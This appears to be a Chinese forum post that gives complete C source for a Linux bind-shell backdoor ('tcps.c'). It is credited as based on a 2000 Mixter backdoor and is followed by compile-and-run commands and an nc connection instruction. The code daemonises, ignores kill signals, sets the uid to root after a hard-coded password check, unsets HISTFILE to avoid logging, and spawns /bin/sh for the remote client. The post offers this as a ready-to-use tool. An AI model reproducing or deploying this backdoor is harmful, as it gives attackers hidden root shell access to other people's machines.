linux后门程序 - 系统/网络安全 - h0ng123 linux,oracle.unix

/*参考(c) 2000 by Mixter <mixter@newyorkoffice.com> http://1337.tsx.org 写的后门程序*/
[root@localhost root]#cat tcps.c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>

#define backlog 64
#define PASSWORD "password" /*连接的密码*/

main(int argc,char **argv)
{
int listenfd,connectfd,f;
pid_t pid;
struct sockaddr_in server;
struct sockaddr_in client;
u_int sin_size;
char p[1000];

if(argc!=2)
{
printf("./tcps <port>.\n");
exit(1);
}

    signal(SIGCHLD, SIG_IGN);
    signal(SIGHUP, SIG_IGN);
    signal(SIGTERM, SIG_IGN);
    signal(SIGINT, SIG_IGN);
if (fork())
    exit(0);

listenfd=socket(AF_INET,SOCK_STREAM,0);
if(listenfd==-1)
{
printf("socket fail\n");
exit(1);
}

memset(&server,0,sizeof(server));
server.sin_family=PF_INET;
server.sin_port=htons(atoi(argv[1]));
server.sin_addr.s_addr=htonl(INADDR_ANY);

if(bind(listenfd,(struct sockaddr*)&server,sizeof(server))==-1)
{
printf("bind fail\n");
exit(1);
}

if(listen(listenfd,backlog)==-1)
{
printf("listen fail\n");
exit(1);
}

sin_size=sizeof(client);

connectfd=accept(listenfd,(struct sockaddr *)&client,&sin_size);
while(connectfd)
{
pid=fork();
if (pid>0)
{
close(connectfd);
continue;
}
else if (pid==0)
{
   recv(connectfd, p, 1000, 0);
#ifndef REMOTELY_EXPLOITABLE
           for (f = 0; f < strlen(p); f++)
                switch (p[f])
                {
                case '|':
                case ';':
                case '&':
                case '>':
                case '`':
                case '\r':
                case '\n':
                    p[f] = '\0';
                    break;
                }
#endif /* REMOTELY_EXPLOITABLE :P */

      if (strncmp(p, PASSWORD,32) != 0)
            {
                send(connectfd, "fail", 4, 0);
                send(connectfd, "\377\373\001", 4, 0);
                close(connectfd);
                exit(1);
            }
            printf("connect success");
            close(0);
            close(1);
            close(2);
            dup2(connectfd, 0);
            dup2(connectfd, 1);
            dup2(connectfd, 2);
            setreuid(0, 0);

            setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1);
            unsetenv("HISTFILE");
            execl("/bin/sh", "sh", (char *) 0);
     close(connectfd);
     exit(0);
}
else
{
printf("fork fail.\n");
exit(1);
}
}
close(listenfd);
}

[root@localhost root]# gcc tcps.c
[root@localhost root]# ./a.out 1234

[root@localhost root]#

然后就可以在windows下用nc连接了

nc -vv ip/域名后门端口号

输入密码就ok了

不过程序还是有些小毛病。。。。。。。。。。。。。。。。。。。。。。。